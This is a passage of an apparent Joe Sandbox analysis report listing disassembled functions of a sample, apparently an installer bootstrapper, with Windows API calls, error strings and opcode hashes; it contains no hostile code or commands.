                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastMessagePostThread
                                                                                                                • String ID: EngineForApplication.cpp$Failed to post apply message.
                                                                                                                • API String ID: 2609174426-1304321051
                                                                                                                • Opcode ID: f964b43d45117eb45a1fad2151b4d999e167a49d67aff3d35e99fd8c649c58ad
                                                                                                                • Instruction ID: c2db5db1543a809fad3a2eab6a8922f979cc5e37932593ba9136802f6d3ac7d6
                                                                                                                • Opcode Fuzzy Hash: f964b43d45117eb45a1fad2151b4d999e167a49d67aff3d35e99fd8c649c58ad
                                                                                                                • Instruction Fuzzy Hash: F7F0A733A5123567D63116965D0DEDBBF8CAF44F70B024010FF58AF191D6649C0092D4
                                                                                                                APIs
                                                                                                                • PostThreadMessageW.USER32(?,00009000,00000000,?), ref: 009BEC71
                                                                                                                • GetLastError.KERNEL32 ref: 009BEC7B
                                                                                                                Strings
                                                                                                                • Failed to post detect message., xrefs: 009BECA9
                                                                                                                • EngineForApplication.cpp, xrefs: 009BEC9F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastMessagePostThread
                                                                                                                • String ID: EngineForApplication.cpp$Failed to post detect message.
                                                                                                                • API String ID: 2609174426-598219917
                                                                                                                • Opcode ID: 70e5d54ffcf60a1931e784cdaaa00c68db474df302126e8c49dbcc328c9b41d2
                                                                                                                • Instruction ID: 575558d738df7668c99cabbbe7554eedcd72bc346cbceb9088cfef4b906f1c2e
                                                                                                                • Opcode Fuzzy Hash: 70e5d54ffcf60a1931e784cdaaa00c68db474df302126e8c49dbcc328c9b41d2
                                                                                                                • Instruction Fuzzy Hash: 1CF0A73764123567D63156965D0DFC7BF98AF45B71B024011BE58AF291E6649C00D2D4
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __alldvrm$_strrchr
                                                                                                                • String ID:
                                                                                                                • API String ID: 1036877536-0
                                                                                                                • Opcode ID: a43b07c52b3a46684783b2fbffe6c2b3820df8a855d7f8bf8198392ab5bcf62a
                                                                                                                • Instruction ID: bc9fd41f48909a1dda2c080452f7fb278e2a561e2c6285e1ca754e2e21d0d8f4
                                                                                                                • Opcode Fuzzy Hash: a43b07c52b3a46684783b2fbffe6c2b3820df8a855d7f8bf8198392ab5bcf62a
                                                                                                                • Instruction Fuzzy Hash: AEA18B76A803869FDB21CF28C8817AEBBE9EF55310F14C56FE5859B381C2389D41C761
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: lstrlen
                                                                                                                • String ID: dlutil.cpp
                                                                                                                • API String ID: 1659193697-2067379296
                                                                                                                • Opcode ID: 532e44d7ecede5e0fc868651a1d9bfc1abdbb0ff641bd32a745129aae752b3e7
                                                                                                                • Instruction ID: 942cf191e8ca6c74a38b6c037373714e0d09d7be7828c383e71618486d840a90
                                                                                                                • Opcode Fuzzy Hash: 532e44d7ecede5e0fc868651a1d9bfc1abdbb0ff641bd32a745129aae752b3e7
                                                                                                                • Instruction Fuzzy Hash: A351E772A01669EBCB129FE68C80AAFBBBDEF98750F064414FD00B7250D731DD019BA0
                                                                                                                APIs
                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,ECE85006,009D2444,00000000,00000000,009D3479,?,009D3479,?,00000001,009D2444,ECE85006,00000001,009D3479,009D3479), ref: 009D9278
                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 009D9301
                                                                                                                • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 009D9313
                                                                                                                • __freea.LIBCMT ref: 009D931C
                                                                                                                  • Part of subcall function 009D521A: RtlAllocateHeap.NTDLL(00000000,?,?,?,009D1F87,?,0000015D,?,?,?,?,009D33E0,000000FF,00000000,?,?), ref: 009D524C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                • String ID:
                                                                                                                • API String ID: 2652629310-0
                                                                                                                • Opcode ID: a4d58163caddfbe5f96e7c0259c67cff4b6fd6ddd5aab8e619f3976415fbb719
                                                                                                                • Instruction ID: e071078896d8de33c1dbc1758789ae5678cbc74cd320726f4bd0cf5a9da39879
                                                                                                                • Opcode Fuzzy Hash: a4d58163caddfbe5f96e7c0259c67cff4b6fd6ddd5aab8e619f3976415fbb719
                                                                                                                • Instruction Fuzzy Hash: 9831BE32A5020AABDF25AF64CC81EAE7BA9EB40310F05812AFC15DB294E735CD51CB90
                                                                                                                APIs
                                                                                                                • CloseHandle.KERNEL32(?,?,?,00000000,?,009A5552,?,?,?,?,?,?), ref: 009A4FFE
                                                                                                                • DeleteCriticalSection.KERNEL32(?,?,?,00000000,?,009A5552,?,?,?,?,?,?), ref: 009A5012
                                                                                                                • TlsFree.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,009A5552,?,?), ref: 009A5101
                                                                                                                • DeleteCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,009A5552,?,?), ref: 009A5108
                                                                                                                  • Part of subcall function 009A1161: LocalFree.KERNEL32(?,?,009A4FBB,?,00000000,?,009A5552,?,?,?,?,?,?), ref: 009A116B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalDeleteFreeSection$CloseHandleLocal
                                                                                                                • String ID:
                                                                                                                • API String ID: 3671900028-0
                                                                                                                • Opcode ID: d0ee3d1a42aeea59e8935325aef6869c6c9631e5e9f29b6f501d23c08089d01f
                                                                                                                • Instruction ID: 5e404a7019ea990524126877703032a26dd827a151647e1062d28ffc07d06f8a
                                                                                                                • Opcode Fuzzy Hash: d0ee3d1a42aeea59e8935325aef6869c6c9631e5e9f29b6f501d23c08089d01f
                                                                                                                • Instruction Fuzzy Hash: 36414EB1600B459BCA31EBB5C889FDB73ECAF85710F450C29B69AD3052EB34F94587A0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 009AF96C: RegCloseKey.ADVAPI32(00000000,?,?,00000001,00000000,00000000,?,?,009A4CA5,?,?,00000001), ref: 009AF9BC
                                                                                                                • CloseHandle.KERNEL32(?,?,?,?,?,?,00000000,?,?,00000001,00000000,?,?,?), ref: 009A4D0C
                                                                                                                Strings
                                                                                                                • Failed to get current process path., xrefs: 009A4CCA
                                                                                                                • Failed to re-launch bundle process after RunOnce: %ls, xrefs: 009A4CF6
                                                                                                                • Unable to get resume command line from the registry, xrefs: 009A4CAB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Close$Handle
                                                                                                                • String ID: Failed to get current process path.$Failed to re-launch bundle process after RunOnce: %ls$Unable to get resume command line from the registry
                                                                                                                • API String ID: 187904097-642631345
                                                                                                                • Opcode ID: 9603edecc7ff1b20b7d35bd952e99e73b8a087205196d8b5e3ffc49724dbfa59
                                                                                                                • Instruction ID: dcd4952b879befafad383322b6e859c54d12435e7162f708a0f4cfc0a92432a7
                                                                                                                • Opcode Fuzzy Hash: 9603edecc7ff1b20b7d35bd952e99e73b8a087205196d8b5e3ffc49724dbfa59
                                                                                                                • Instruction Fuzzy Hash: BC115131D0155DBB8F22AB96DC059EEBBB8EFC1721B108196F810B7211DBB19E50DBC0
                                                                                                                APIs
                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,009D8A56,00000000,00000000,?,009D8859,009D8A56,00000000,00000000,00000000,?,009D8A56,00000006,FlsSetValue), ref: 009D88E4
                                                                                                                • GetLastError.KERNEL32(?,009D8859,009D8A56,00000000,00000000,00000000,?,009D8A56,00000006,FlsSetValue,00A02404,00A0240C,00000000,00000364,?,009D6230), ref: 009D88F0
                                                                                                                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,009D8859,009D8A56,00000000,00000000,00000000,?,009D8A56,00000006,FlsSetValue,00A02404,00A0240C,00000000), ref: 009D88FE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LibraryLoad$ErrorLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 3177248105-0
                                                                                                                • Opcode ID: 9d16654aef7447fa09db8a664a752a6b648a8f2868e763970aeb49f5e67d2f99
                                                                                                                • Instruction ID: 2dfc4e16a8fb956a2eaf601bb7779a17a53c368a71f2cb1885645168dd42fcb4
                                                                                                                • Opcode Fuzzy Hash: 9d16654aef7447fa09db8a664a752a6b648a8f2868e763970aeb49f5e67d2f99
                                                                                                                • Instruction Fuzzy Hash: 3A012B327A5227ABCB214B699C94A7B779CEF15BA1B104A21F956EB341DF30DC01C7E0
                                                                                                                APIs
                                                                                                                • GetLastError.KERNEL32(?,00000000,009D1AEC,00000000,80004004,?,009D1DF0,00000000,80004004,00000000,00000000), ref: 009D6162
                                                                                                                • SetLastError.KERNEL32(00000000,80004004,00000000,00000000), ref: 009D61CA
                                                                                                                • SetLastError.KERNEL32(00000000,80004004,00000000,00000000), ref: 009D61D6
                                                                                                                • _abort.LIBCMT ref: 009D61DC
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLast$_abort
                                                                                                                • String ID:
                                                                                                                • API String ID: 88804580-0
                                                                                                                • Opcode ID: 1b37c4d3ce6ea4315a3101fbe0d6230708c560764263184f56ba7c5cea54c1f6
                                                                                                                • Instruction ID: d59707957c0fd57f3ed43739736434ff4f704ed2b6b87d36b03725ff66c798b7
                                                                                                                • Opcode Fuzzy Hash: 1b37c4d3ce6ea4315a3101fbe0d6230708c560764263184f56ba7c5cea54c1f6
                                                                                                                • Instruction Fuzzy Hash: 3DF0C8355CCB02A7C21237396C0AB2F166D9FD1772B26C117FA24A6393FF649C025261
                                                                                                                APIs
                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 009A7441
                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,00000000), ref: 009A74A8
                                                                                                                Strings
                                                                                                                • Failed to get value as numeric for variable: %ls, xrefs: 009A7497
                                                                                                                • Failed to get value of variable: %ls, xrefs: 009A747B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$EnterLeave
                                                                                                                • String ID: Failed to get value as numeric for variable: %ls$Failed to get value of variable: %ls
                                                                                                                • API String ID: 3168844106-4270472870
                                                                                                                • Opcode ID: a46addc75b7ecafead8ef121dfce394bc8d6aca27d45f600726d9da95b95ee76
                                                                                                                • Instruction ID: 4731f532c627d43533364b068cadca6b623c8d058c106471beed7eb5e35f97b6
                                                                                                                • Opcode Fuzzy Hash: a46addc75b7ecafead8ef121dfce394bc8d6aca27d45f600726d9da95b95ee76
                                                                                                                • Instruction Fuzzy Hash: FA01D472908128FBCF125F94CC46B9EBFA9AF05330F008124FC04AA231C3369E109BD0
                                                                                                                APIs
                                                                                                                • EnterCriticalSection.KERNEL32(?), ref: 009A75B6
                                                                                                                • LeaveCriticalSection.KERNEL32(?,?,?,00000000), ref: 009A761D
                                                                                                                Strings
                                                                                                                • Failed to get value of variable: %ls, xrefs: 009A75F0
                                                                                                                • Failed to get value as version for variable: %ls, xrefs: 009A760C
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$EnterLeave
                                                                                                                • String ID: Failed to get value as version for variable: %ls$Failed to get value of variable: %ls
                                                                                                                • API String ID: 3168844106-1851729331
                                                                                                                • Opcode ID: 741c0de967e5899412204f83b2390b05fc4388c1164bcf63ea63bf176fba1eb6
                                                                                                                • Instruction ID: 4cf17cc1bbeea96679d1d0caac543875352c2f4e80247292db57aa705a90b838
                                                                                                                • Opcode Fuzzy Hash: 741c0de967e5899412204f83b2390b05fc4388c1164bcf63ea63bf176fba1eb6
                                                                                                                • Instruction Fuzzy Hash: D701DF32D08529FBCF125F84CC0AB9EBB68EF11324F004124FD04AB221D33A9E10ABD5
                                                                                                                APIs
                                                                                                                • EnterCriticalSection.KERNEL32(00000000,00000000,00000006,?,009A9897,00000000,?,00000000,00000000,00000000,?,009A96D6,00000000,?,00000000,00000000), ref: 009A7545
                                                                                                                • LeaveCriticalSection.KERNEL32(00000000,00000000,00000000,00000000,?,009A9897,00000000,?,00000000,00000000,00000000,?,009A96D6,00000000,?,00000000), ref: 009A759B
                                                                                                                Strings
                                                                                                                • Failed to copy value of variable: %ls, xrefs: 009A758A
                                                                                                                • Failed to get value of variable: %ls, xrefs: 009A756B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CriticalSection$EnterLeave
                                                                                                                • String ID: Failed to copy value of variable: %ls$Failed to get value of variable: %ls
                                                                                                                • API String ID: 3168844106-2936390398
                                                                                                                • Opcode ID: 2a59aea50418f83261ea7a3a05173ddd5b2d74adcc9942b3dd4cd3b02014cc68
                                                                                                                • Instruction ID: 23e24be73b0377a9f0050cc802ac077c9d5df305b2a3c7481be6e3cd910367ee
                                                                                                                • Opcode Fuzzy Hash: 2a59aea50418f83261ea7a3a05173ddd5b2d74adcc9942b3dd4cd3b02014cc68
                                                                                                                • Instruction Fuzzy Hash: 0DF08C72944268BBCF126F94CC0AE9E7B68EF45365F008124FD04AA260C3369E20ABD0
                                                                                                                APIs
                                                                                                                • GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 009CE788
                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 009CE797
                                                                                                                • GetCurrentProcessId.KERNEL32 ref: 009CE7A0
                                                                                                                • QueryPerformanceCounter.KERNEL32(?), ref: 009CE7AD
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                • String ID:
                                                                                                                • API String ID: 2933794660-0
                                                                                                                • Opcode ID: 0e31a80d140ce5359086e83eceff6b60edfd741a4cb695c19a4b1e8f39c345aa
                                                                                                                • Instruction ID: 80895aa37e822280fe19c4646a70f141696afbd798aaaf5c41d1e78379d4d0a3
                                                                                                                • Opcode Fuzzy Hash: 0e31a80d140ce5359086e83eceff6b60edfd741a4cb695c19a4b1e8f39c345aa
                                                                                                                • Instruction Fuzzy Hash: B1F04D71C2524DEBCB00DBB4D989A9EBBF8EF18315F514899A415EB110E734AB049B61
                                                                                                                APIs
                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 009E0DD7
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Close
                                                                                                                • String ID: regutil.cpp
                                                                                                                • API String ID: 3535843008-955085611
                                                                                                                • Opcode ID: b2b1640791905c30474762b72395fb84de25ee23c3a9cf3f7147f9309004937e
                                                                                                                • Instruction ID: c9fe1f8a8f91c49496f3121cc02bdd72ecbe652c9d6e37c35b7ccbecf4acbd80
                                                                                                                • Opcode Fuzzy Hash: b2b1640791905c30474762b72395fb84de25ee23c3a9cf3f7147f9309004937e
                                                                                                                • Instruction Fuzzy Hash: 3C41E732D013A9EBDB338AD6CC047AE7769ABC0720F258164FD44AA190D7F59DD19BD0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 009E0F6C: RegOpenKeyExW.KERNELBASE(00000000,00000000,00000000,00000000,00000001,00A0AAA0,00000000,?,009E57E1,80000002,00000000,00020019,00000000,SOFTWARE\Policies\,00000000,00000000), ref: 009E0F80
                                                                                                                • RegCloseKey.ADVAPI32(00000000,80000002,SYSTEM\CurrentControlSet\Control\Session Manager,00000003,?,00000000,00000000,00000101), ref: 009E48FC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseOpen
                                                                                                                • String ID: PendingFileRenameOperations$SYSTEM\CurrentControlSet\Control\Session Manager
                                                                                                                • API String ID: 47109696-3023217399
                                                                                                                • Opcode ID: bc01344d9faefbccbd72b0360ae32d917e8be39f8578f65c011cbfef0bad02a0
                                                                                                                • Instruction ID: 79c96c51d3f3cba4dc41721f0f67559f915359cfa248eac136424bd3b88d780a
                                                                                                                • Opcode Fuzzy Hash: bc01344d9faefbccbd72b0360ae32d917e8be39f8578f65c011cbfef0bad02a0
                                                                                                                • Instruction Fuzzy Hash: C041A375E00199EFCF22DF9AC881EAEBBB9FF44B10F2140A9E500A7251D7319E50DB90
                                                                                                                APIs
                                                                                                                • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000001,00000000,00000000,00000000,00000000,00000000), ref: 009E112B
                                                                                                                • RegQueryValueExW.ADVAPI32(?,00000000,00000000,?,00000000,00000000,00000000,?), ref: 009E1163
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206367024.00000000009EB000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2206546436.0000000000A0A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 00000010.00000002.2207037303.0000000000A0D000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_16_2_9a0000_IMAKBWPY.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: QueryValue
                                                                                                                • String ID: regutil.cpp
                                                                                                                • API String ID: 3660427363-955085611
                                                                                                                • Opcode ID: d422da03eac6281246d262b6b969ea16e7aedad5e7d3ee0187af87781673ee1f
                                                                                                                • Instruction ID: 395b4f21eec906096bad402d4f8833f0d60ba6e4836f08de8c6d461c0738d3df
                                                                                                                • Opcode Fuzzy Hash: d422da03eac6281246d262b6b969ea16e7aedad5e7d3ee0187af87781673ee1f
                                                                                                                • Instruction Fuzzy Hash: 9041A332D041AAFBDB229F96CC41AAEBBBDFF44350F108569FA10A7250D7319E118B90
                                                                                                                APIs
                                                                                                                • WideCharToMultiByte.KERNEL32(009EB518,00000000,00000006,00000001,comres.dll,?,00000000,?,00000000,?,?,00000000,00000006,?,comres.dll,?), ref: 009D67A3
                                                                                                                • GetLastError.KERNEL32 ref: 009D67BF
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000010.00000002.2205818822.00000000009A1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                • Associated: 00000010.00000002.2205726056.00000000009A0000.00000002.00000001.01000000.0000000F.sdmpDownload File
